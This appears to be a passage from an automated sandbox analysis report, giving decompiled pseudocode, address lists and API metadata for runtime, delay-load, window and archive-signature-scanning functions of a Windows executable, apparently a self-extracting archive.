				 *0x124d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E01233185(__eflags, _t1, 0x127004c);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E01231FDF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                    0x01231fb1
                                                                                                                                                    0x01231fb6
                                                                                                                                                    0x01231fbf
                                                                                                                                                    0x01231fca
                                                                                                                                                    0x01231fd0
                                                                                                                                                    0x01231fd1
                                                                                                                                                    0x01231fd3
                                                                                                                                                    0x01231fde
                                                                                                                                                    0x01231fd5
                                                                                                                                                    0x01231fd5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01231fd5
                                                                                                                                                    0x01231fc1
                                                                                                                                                    0x01231fc1
                                                                                                                                                    0x01231fc3
                                                                                                                                                    0x01231fc3

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 012330D7: try_get_function.LIBVCRUNTIME ref: 012330EC
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01231FCA
                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01231FD5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 806969131-0
                                                                                                                                                    • Opcode ID: 007f9ee421130cffbdf1f502764f9b0b5c26c4096f781efb2edfaf85ae184e96
                                                                                                                                                    • Instruction ID: 59d6c8b17b982c42fe1e0d9b4d5245c5ecf6fcb0912179aa3a346326c3c1dc0f
                                                                                                                                                    • Opcode Fuzzy Hash: 007f9ee421130cffbdf1f502764f9b0b5c26c4096f781efb2edfaf85ae184e96
                                                                                                                                                    • Instruction Fuzzy Hash: DBD022F82383035A5E20BABA38018BA23C168F2BB1360074FF120898C5EF3280227625
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DABD, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                    			E0122DABD(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0x1244540 & 0x00001000) == 0) {
					return _t5;
				} else {
					E0122DB6B(__ecx, __esi);
					_t8 =  *0x126fcd8 + 1;
					 *0x126fcd8 = _t8;
					if(_t8 == 1) {
						E0122DCBD(4, 0x126fcdc); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0x124d668; // 0x6c4f95b1
					_v8 = _t9 ^ _t26;
					if(E0122DAF0() == 0) {
						 *0x126fcd4 = 0;
					} else {
						 *0x1242260(0x126fcd4, _t20);
						 *((intOrPtr*)( *0x126fcd0))();
					}
					return E0122EA8A(_v8 ^ _t24);
				}
			}










                                                                                                                                                    0x0122dabd
                                                                                                                                                    0x0122dabd
                                                                                                                                                    0x0122dac7
                                                                                                                                                    0x0122daef
                                                                                                                                                    0x0122dac9
                                                                                                                                                    0x0122dac9
                                                                                                                                                    0x0122dad3
                                                                                                                                                    0x0122dad4
                                                                                                                                                    0x0122dadc
                                                                                                                                                    0x0122dae5
                                                                                                                                                    0x0122dae5
                                                                                                                                                    0x0122dd68
                                                                                                                                                    0x0122dd6a
                                                                                                                                                    0x0122dd6b
                                                                                                                                                    0x0122dd72
                                                                                                                                                    0x0122dd7c
                                                                                                                                                    0x0122dd97
                                                                                                                                                    0x0122dd7e
                                                                                                                                                    0x0122dd8c
                                                                                                                                                    0x0122dd92
                                                                                                                                                    0x0122dd94
                                                                                                                                                    0x0122ddae
                                                                                                                                                    0x0122ddae

                                                                                                                                                    APIs
                                                                                                                                                    • DloadLock.DELAYIMP ref: 0122DAC9
                                                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0122DAE5
                                                                                                                                                      • Part of subcall function 0122DCBD: DloadObtainSection.DELAYIMP ref: 0122DCCD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Dload$Section$LockObtainProtect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 731663317-0
                                                                                                                                                    • Opcode ID: 682b6838c7bc8a2ba4a7f61455cc153200fbf8757ada2a8e903ac45b192ef332
                                                                                                                                                    • Instruction ID: 8acbf0cbd3b22043b0cb7807474ad6b5aa14b1d8ee285babc02b54f5b6ad6f39
                                                                                                                                                    • Opcode Fuzzy Hash: 682b6838c7bc8a2ba4a7f61455cc153200fbf8757ada2a8e903ac45b192ef332
                                                                                                                                                    • Instruction Fuzzy Hash: EAD0C97512856A6FDB75FBA8B6E9F2D2650A314701F900014EA42D74DDDBA44081C745
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012112E6, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E012112E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                                                                                                                                                    0x012112ed
                                                                                                                                                    0x01211302
                                                                                                                                                    0x01211308

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemShowWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3351165006-0
                                                                                                                                                    • Opcode ID: ce4aa01d97ae3919c1128ab267d589d2ae6951670f540756dff1946b7697088a
                                                                                                                                                    • Instruction ID: c0bc9b37135520bdb8769a0fc6ebfd4d28739dee647a7643eda8ecd01a29a1cd
                                                                                                                                                    • Opcode Fuzzy Hash: ce4aa01d97ae3919c1128ab267d589d2ae6951670f540756dff1946b7697088a
                                                                                                                                                    • Instruction Fuzzy Hash: D1C01232058200BECB010BB0FC0ED2BBBA8AFA4212F04C908B0A5C0054CA3AC020DB11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012119D6, Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                    			E012119D6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E0122E0E4(E01241AF9, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0x1242260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E01211DD8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E01217076(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0x1242260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0x1242260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E012115D1(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E01213A95(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E01211380(__eflags, 0x1b, _t172 + 0x1e);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E0121FD96(_t172 + 0x6cfa, _t172 + 0x1e, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0x1242260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E01213A95(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0x1242260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E01211F0A(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E01211F0A(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E01213A95(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0x1242260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E01211380(__eflags, 0x3c, _t172 + 0x1e);
								goto L1;
							}
							E012115D1(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E01211DD8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0x1242260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0x1242260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0x1242260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0x1242260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}








































                                                                                                                                                    0x012119d6
                                                                                                                                                    0x012119d6
                                                                                                                                                    0x012119db
                                                                                                                                                    0x012119e4
                                                                                                                                                    0x012119ec
                                                                                                                                                    0x012119f3
                                                                                                                                                    0x012119fa
                                                                                                                                                    0x01211a06
                                                                                                                                                    0x01211a13
                                                                                                                                                    0x01211a1e
                                                                                                                                                    0x01211a21
                                                                                                                                                    0x01211a27
                                                                                                                                                    0x01211a2c
                                                                                                                                                    0x01211a2e
                                                                                                                                                    0x01211a74
                                                                                                                                                    0x01211a7b
                                                                                                                                                    0x01211a83
                                                                                                                                                    0x01211a8b
                                                                                                                                                    0x01211a99
                                                                                                                                                    0x01211a9f
                                                                                                                                                    0x01211aa7
                                                                                                                                                    0x01211aaa
                                                                                                                                                    0x01211aac
                                                                                                                                                    0x01211aae
                                                                                                                                                    0x01211ab1
                                                                                                                                                    0x01211ab3
                                                                                                                                                    0x01211b56
                                                                                                                                                    0x01211b56
                                                                                                                                                    0x01211b5d
                                                                                                                                                    0x01211b60
                                                                                                                                                    0x01211b6c
                                                                                                                                                    0x01211b6c
                                                                                                                                                    0x01211b6c
                                                                                                                                                    0x01211b70
                                                                                                                                                    0x01211b75
                                                                                                                                                    0x01211b75
                                                                                                                                                    0x01211b7b
                                                                                                                                                    0x01211b7e
                                                                                                                                                    0x01211b90
                                                                                                                                                    0x01211b93
                                                                                                                                                    0x01211bcd
                                                                                                                                                    0x01211bd7
                                                                                                                                                    0x01211bdb
                                                                                                                                                    0x01211be3
                                                                                                                                                    0x01211be8
                                                                                                                                                    0x01211beb
                                                                                                                                                    0x01211bed
                                                                                                                                                    0x01211c2f
                                                                                                                                                    0x01211c2f
                                                                                                                                                    0x01211c32
                                                                                                                                                    0x01211c32
                                                                                                                                                    0x01211c38
                                                                                                                                                    0x01211c3a
                                                                                                                                                    0x01211c46
                                                                                                                                                    0x01211c46
                                                                                                                                                    0x01211c4d
                                                                                                                                                    0x01211c53
                                                                                                                                                    0x01211c53
                                                                                                                                                    0x01211c55
                                                                                                                                                    0x01211c5d
                                                                                                                                                    0x01211c5d
                                                                                                                                                    0x01211c62
                                                                                                                                                    0x01211c66
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c6c
                                                                                                                                                    0x01211c6c
                                                                                                                                                    0x01211c6c
                                                                                                                                                    0x01211c76
                                                                                                                                                    0x01211c7c
                                                                                                                                                    0x01211d8e
                                                                                                                                                    0x01211d8e
                                                                                                                                                    0x01211d95
                                                                                                                                                    0x01211da0
                                                                                                                                                    0x01211db0
                                                                                                                                                    0x01211db5
                                                                                                                                                    0x01211db5
                                                                                                                                                    0x01211db7
                                                                                                                                                    0x01211dbd
                                                                                                                                                    0x01211dc7
                                                                                                                                                    0x01211dc7
                                                                                                                                                    0x01211d97
                                                                                                                                                    0x01211d9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d9e
                                                                                                                                                    0x01211c82
                                                                                                                                                    0x01211c89
                                                                                                                                                    0x01211c98
                                                                                                                                                    0x01211c9f
                                                                                                                                                    0x01211ca9
                                                                                                                                                    0x01211cab
                                                                                                                                                    0x01211cb3
                                                                                                                                                    0x01211cbc
                                                                                                                                                    0x01211cc5
                                                                                                                                                    0x01211cce
                                                                                                                                                    0x01211cd7
                                                                                                                                                    0x01211d20
                                                                                                                                                    0x01211d22
                                                                                                                                                    0x01211d27
                                                                                                                                                    0x01211d29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211ce3
                                                                                                                                                    0x01211ce9
                                                                                                                                                    0x01211cec
                                                                                                                                                    0x01211d0f
                                                                                                                                                    0x01211d12
                                                                                                                                                    0x01211d2d
                                                                                                                                                    0x01211d34
                                                                                                                                                    0x01211d44
                                                                                                                                                    0x01211d44
                                                                                                                                                    0x01211d44
                                                                                                                                                    0x01211d46
                                                                                                                                                    0x01211d46
                                                                                                                                                    0x01211d4c
                                                                                                                                                    0x01211d4f
                                                                                                                                                    0x01211d58
                                                                                                                                                    0x01211d61
                                                                                                                                                    0x01211d6a
                                                                                                                                                    0x01211d73
                                                                                                                                                    0x01211d84
                                                                                                                                                    0x01211d8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d8c
                                                                                                                                                    0x01211d36
                                                                                                                                                    0x01211d3d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d41
                                                                                                                                                    0x01211d14
                                                                                                                                                    0x01211d17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d19
                                                                                                                                                    0x01211d1b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d1b
                                                                                                                                                    0x01211cee
                                                                                                                                                    0x01211cf5
                                                                                                                                                    0x01211d05
                                                                                                                                                    0x01211d05
                                                                                                                                                    0x01211d05
                                                                                                                                                    0x01211d07
                                                                                                                                                    0x01211d07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d07
                                                                                                                                                    0x01211cf7
                                                                                                                                                    0x01211cfe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211d2b
                                                                                                                                                    0x01211c8b
                                                                                                                                                    0x01211c92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c92
                                                                                                                                                    0x01211c66
                                                                                                                                                    0x01211c4f
                                                                                                                                                    0x01211c51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c51
                                                                                                                                                    0x01211c3c
                                                                                                                                                    0x01211c40
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c40
                                                                                                                                                    0x01211bef
                                                                                                                                                    0x01211bf1
                                                                                                                                                    0x01211bf4
                                                                                                                                                    0x01211bf6
                                                                                                                                                    0x01211bfb
                                                                                                                                                    0x01211c01
                                                                                                                                                    0x01211c04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c0a
                                                                                                                                                    0x01211c11
                                                                                                                                                    0x01211c1c
                                                                                                                                                    0x01211c1e
                                                                                                                                                    0x01211c23
                                                                                                                                                    0x01211c25
                                                                                                                                                    0x01211c28
                                                                                                                                                    0x01211c2b
                                                                                                                                                    0x01211c2d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c2d
                                                                                                                                                    0x01211c13
                                                                                                                                                    0x01211c16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211c16
                                                                                                                                                    0x01211cdc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211cdc
                                                                                                                                                    0x01211b97
                                                                                                                                                    0x01211ba0
                                                                                                                                                    0x01211ba5
                                                                                                                                                    0x01211bad
                                                                                                                                                    0x01211baf
                                                                                                                                                    0x01211bb2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211bb8
                                                                                                                                                    0x01211bbb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211bc1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211bc1
                                                                                                                                                    0x01211b86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b86
                                                                                                                                                    0x01211b62
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211ab9
                                                                                                                                                    0x01211ab9
                                                                                                                                                    0x01211abc
                                                                                                                                                    0x01211abe
                                                                                                                                                    0x01211ac1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211ac7
                                                                                                                                                    0x01211acc
                                                                                                                                                    0x01211ace
                                                                                                                                                    0x01211b0a
                                                                                                                                                    0x01211b0a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b0a
                                                                                                                                                    0x01211ad0
                                                                                                                                                    0x01211ad3
                                                                                                                                                    0x01211ad9
                                                                                                                                                    0x01211adc
                                                                                                                                                    0x01211b14
                                                                                                                                                    0x01211b16
                                                                                                                                                    0x01211b1c
                                                                                                                                                    0x01211b22
                                                                                                                                                    0x01211b28
                                                                                                                                                    0x01211b30
                                                                                                                                                    0x01211b32
                                                                                                                                                    0x01211b38
                                                                                                                                                    0x01211b3b
                                                                                                                                                    0x01211b42
                                                                                                                                                    0x01211b47
                                                                                                                                                    0x01211b4c
                                                                                                                                                    0x01211b54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b54
                                                                                                                                                    0x01211b3d
                                                                                                                                                    0x01211b40
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b40
                                                                                                                                                    0x01211ade
                                                                                                                                                    0x01211ae0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211ae2
                                                                                                                                                    0x01211ae5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211ae7
                                                                                                                                                    0x01211aeb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211af0
                                                                                                                                                    0x01211af2
                                                                                                                                                    0x01211af6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211af8
                                                                                                                                                    0x01211afc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211afe
                                                                                                                                                    0x01211b02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b04
                                                                                                                                                    0x01211b08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b0d
                                                                                                                                                    0x01211b0d
                                                                                                                                                    0x01211b0e
                                                                                                                                                    0x01211b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211b12
                                                                                                                                                    0x01211a30
                                                                                                                                                    0x01211a36
